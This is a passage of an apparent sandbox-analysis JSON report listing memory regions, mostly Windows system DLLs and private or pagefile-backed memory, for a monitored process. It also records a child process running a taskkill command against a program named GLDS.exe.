"region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:23.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2606", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:23.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2607", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:23.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2608", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2609", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:23.086", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2610", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:23.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2611", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:23.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2612", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:23.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2613", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:23.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2614", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:23.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2615", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:23.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2616", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:23.089", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2617", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:23.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2618", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:23.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2619", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:23.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2620", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:23.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2621", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:23.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2622", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:23.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2623", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:23.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2624", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:23.093", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 8224767, "entry_point": 0, "filename": null, "id": "region_2625", "name": "pagefile_0x0000000000650000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6619136, "timestamp": "00:01:23.103", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2626", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:23.103", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2627", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:23.103", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2628", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_2629", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2630", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_2631", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_2632", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_2633", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_2634", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 2621440, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2635", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2621440, "timestamp": "00:01:23.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9834495, "entry_point": 0, "filename": null, "id": "region_2636", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:23.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 10289151, "entry_point": 0, "filename": null, "id": "region_2637", "name": "private_0x0000000000990000", "norm_filename": null, "region_type": "private_memory", "start_va": 10027008, "timestamp": "00:01:23.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 11468800, "type": "region", "version": 1 }, "end_va": 11730943, "entry_point": 0, "filename": null, "id": "region_2638", "name": "private_0x0000000000af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11468800, "timestamp": "00:01:23.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 14876672, "type": "region", "version": 1 }, "end_va": 35848191, "entry_point": 0, "filename": null, "id": "region_2639", "name": "pagefile_0x0000000000e30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14876672, "timestamp": "00:01:23.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2640", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:23.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2641", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:23.194", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_2642", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:23.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2643", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:23.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2644", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:23.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_2645", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:23.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 13172736, "type": "region", "version": 1 }, "end_va": 13434879, "entry_point": 0, "filename": null, "id": "region_2646", "name": "private_0x0000000000c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 13172736, "timestamp": "00:01:23.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2647", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:23.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_2648", "name": "private_0x00000000004e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5111808, "timestamp": "00:01:23.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12255232, "type": "region", "version": 1 }, "end_va": 12517375, "entry_point": 0, "filename": null, "id": "region_2649", "name": "private_0x0000000000bb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 12255232, "timestamp": "00:01:23.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35848192, "type": "region", "version": 1 }, "end_va": 38793215, "entry_point": 35848192, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2650", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35848192, "timestamp": "00:01:23.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2651", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:23.214", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2652", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:23.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2653", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:23.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2654", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:23.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10616832, "type": "region", "version": 1 }, "end_va": 10878975, "entry_point": 0, "filename": null, "id": "region_2655", "name": "private_0x0000000000a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 10616832, "timestamp": "00:01:23.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 12845055, "entry_point": 0, "filename": null, "id": "region_2656", "name": "private_0x0000000000c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 12582912, "timestamp": "00:01:23.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 13107199, "entry_point": 0, "filename": null, "id": "region_2657", "name": "private_0x0000000000c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 12845056, "timestamp": "00:01:23.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 13434880, "type": "region", "version": 1 }, "end_va": 13697023, "entry_point": 0, "filename": null, "id": "region_2658", "name": "private_0x0000000000cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 13434880, "timestamp": "00:01:23.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2659", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:23.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2660", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:23.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2661", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:23.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1785921536, "type": "region", "version": 1 }, "end_va": 1786019839, "entry_point": 1785926453, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2662", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1785921536, "timestamp": "00:01:23.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1786052608, "type": "region", "version": 1 }, "end_va": 1786667007, "entry_point": 1786181817, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2663", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1786052608, "timestamp": "00:01:23.282", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM GLDS.exe /IM GLDS.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_19", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 19, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2664", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:23.514", "type": "region", "version": 1 }, { "dump": { "filename": 